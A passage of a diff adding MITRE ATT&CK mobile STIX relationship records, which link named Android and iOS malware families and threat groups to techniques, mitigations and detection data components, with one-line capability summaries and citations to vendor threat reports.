+ "type": "relationship", + "created": "2019-07-10T15:25:57.602Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "modified": "2019-08-12T17:30:07.571Z", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) uses the device microphone to record phone conversations.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b697a198-8949-43e0-b2b8-23498373c920", + "created": "2023-03-20T18:37:13.628Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:37:13.628Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--c6a146ae-9c63-4606-97ff-e261e76e8380", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2115228b-c61a-4ebb-829a-df7355635fbf", + "created": "2020-12-17T20:15:22.491Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:50:12.639Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can detect if the app is running on an emulator.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--70f8cbed-b20d-4ff2-ad02-8d78e7d49159", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-Xbot", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Xbot](https://attack.mitre.org/software/S0298) can encrypt the victim's files in external storage (e.g., SD card) and then request a PayPal cash card as ransom.(Citation: PaloAlto-Xbot)", + "relationship_type": "uses", + "source_ref": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "target_ref": "attack-pattern--d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--39b854c1-5906-4d14-a0bc-1242c3eaa5b0", + "created": "2022-04-11T20:05:56.540Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-11T20:05:56.540Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "target_ref": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4b16e681-9542-4f32-b23a-f1b0caf44b6a", + "type": "relationship", + "created": "2020-12-24T21:55:56.726Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.726Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has downloaded additional code to root devices, such as TowelRoot.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d71fab20-a56c-4404-a65d-aaa37056f16e", + "created": "2022-04-01T15:16:16.027Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Trend Micro iOS URL Hijacking", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/", + "description": "L. Wu, Y. Zhou, M. Li. (2019, July 12). iOS URL Scheme Susceptible to Hijacking. Retrieved September 11, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "iOS 11 introduced a first-come-first-served principle for URIs, allowing only the prior installed app to be launched via the URI.(Citation: Trend Micro iOS URL Hijacking) Android 6 introduced App Links.", + "modified": "2022-04-01T15:16:16.027Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1a5bde32-aaa9-42d0-ab70-c9f11b0ae81e", + "created": "2020-09-14T14:13:45.299Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[eSurv](https://attack.mitre.org/software/S0507)’s Android version has used public key encryption and certificate pinning for C2 communication.(Citation: Lookout eSurv)", + "modified": "2022-04-18T15:58:08.240Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b9af8369-a6b2-4081-9f07-2ee15d56bffc", + "type": "relationship", + "created": "2020-06-02T14:32:31.871Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-24T18:24:35.795Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can collect application database files, including Gmail, Hangouts, device photos, and container directories of third-party apps.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bff3f22c-660d-4ceb-b1bb-dbd064d363c0", + "created": "2023-03-15T16:39:32.117Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:39:32.117Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--60ad088f-3133-4b0c-a441-e1e06fff1765", + "created": "2023-02-06T19:37:56.416Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:34:29.147Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can gather data about the device.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c6464a84-e23b-412f-b435-5b23853d3643", + "created": "2020-09-14T13:35:45.909Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "ESET-Twitoor", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Twitoor](https://attack.mitre.org/software/S0302) encrypts its C2 communication.(Citation: ESET-Twitoor)", + "modified": "2022-04-20T12:58:23.550Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "target_ref": "attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--38f96449-dfb1-49db-b0d0-f257c3ee2c5d", + "created": "2020-09-11T14:54:16.587Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/desert-scorpion-google-play" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:25:21.998Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can retrieve SMS messages.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6bb4de7d-1ef9-4bc8-8d34-62e176d4188a", + "created": "2023-03-03T15:42:28.475Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:17:24.417Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can send large amounts of device data over its C2 channel, including the device’s manufacturer, model, version and serial number, telephone number, and IP address.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9373912a-affa-4a3c-ad97-1b8311e228ee", + "type": "relationship", + "created": "2019-09-04T14:28:15.991Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:12.803Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) checks if the device is connected via Wi-Fi or mobile data.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eef8fb1f-3e8c-44d7-b0d1-1fbad81e392f", + "created": "2019-07-16T14:33:12.107Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Kaspersky Triada June 2016", + "url": "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", + "description": "Kivva, A. (2016, June 6). Everyone sees not what they want to see. Retrieved July 16, 2019." + }, + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Triada](https://attack.mitre.org/software/S0424) can redirect ad banner URLs on websites visited by the user to specific ad URLs.(Citation: Google Triada June 2019)(Citation: Kaspersky Triada June 2016) ", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f240e06c-3a5b-4a34-a69c-5fccb4c94150", + "type": "relationship", + "created": "2020-05-11T16:37:36.673Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "source_name": "ThreatFabric Ginp" + } + ], + "modified": "2020-05-11T16:37:36.673Z", + "description": " [Ginp](https://attack.mitre.org/software/S0423) can download device logs.(Citation: ThreatFabric Ginp) ", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6661823b-4fdd-4879-ad5d-64c9a4b12519", + "created": "2022-04-05T17:03:53.457Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:03:53.457Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--08f1a4b1-96c9-44c2-bc5b-5a779541213b", + "created": "2019-12-10T16:07:41.081Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:47:53.438Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) replaces `/system/bin/ip` with a malicious version. [Dvmap](https://attack.mitre.org/software/S0420) can inject code by patching `libdmv.so` or `libandroid_runtime.so`, depending on the Android OS version. Both libraries are related to the Dalvik and ART runtime environments. The patched functions can only call `/system/bin/ip`, which was replaced with the malicious version.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4d4dfc26-3ab7-4798-abf2-be8dc278fdfa", + "type": "relationship", + "created": "2020-11-24T17:55:12.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.804Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) has the capability to remotely load plugins and download and compile new .NET code.(Citation: Talos GPlayed) ", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0800f6bf-00c5-46d8-b876-1eeeb81b741f", + "created": "2023-03-20T15:55:32.395Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:55:32.395Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--c548d8c4-a0a3-4a24-bb79-2a84abbc7b36", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--53ebd5b6-e60e-4aa4-a342-de586917f06d", + "created": "2023-03-20T18:38:36.873Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:38:36.873Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3ca453a4-bd78-4087-a93f-9261fb2e3f00", + "type": "relationship", + "created": "2020-09-15T15:18:12.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-09-15T15:18:12.421Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect a list of installed applications.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1317fb3d-ded3-4b84-8007-147f3b02948a", + "created": "2022-04-05T19:52:38.539Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "CSRIC-WG1-FinalReport", + "description": "CSRIC-WG1-FinalReport" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Filtering requests by checking request origin information may provide some defense against spurious operators.(Citation: CSRIC-WG1-FinalReport) ", + "modified": "2022-04-05T19:52:38.539Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e829ee51-1caf-4665-ba15-7f8979634124", + "target_ref": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--049b0c71-63e3-47ce-bb0b-149df0344b15", + "created": "2020-12-24T21:45:56.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:15:59.861Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can access device contacts.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a87fa426-3968-4d3b-8f8d-8e3c3a9c32f5", + "type": "relationship", + "created": "2019-09-03T20:08:00.764Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "source_name": "Talos Gustuff Apr 2019" + } + ], + "modified": "2019-09-15T15:35:33.379Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) gathers information about the device, including the default SMS application, if SafetyNet is enabled, the battery level, the operating system version, and if the malware has elevated permissions.(Citation: Talos Gustuff Apr 2019)", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--90d58c65-acb9-4d7b-89b9-f4b35593c861", + "created": "2021-02-08T16:36:20.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:06:46.369Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included SMS message exfiltration in the malicious apps deployed as part of Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3997b2a1-2b70-4eeb-aa8f-1053bb3744c2", + "created": "2023-03-20T19:00:26.780Z", + "revoked": false, + "object_marking_refs": [ + 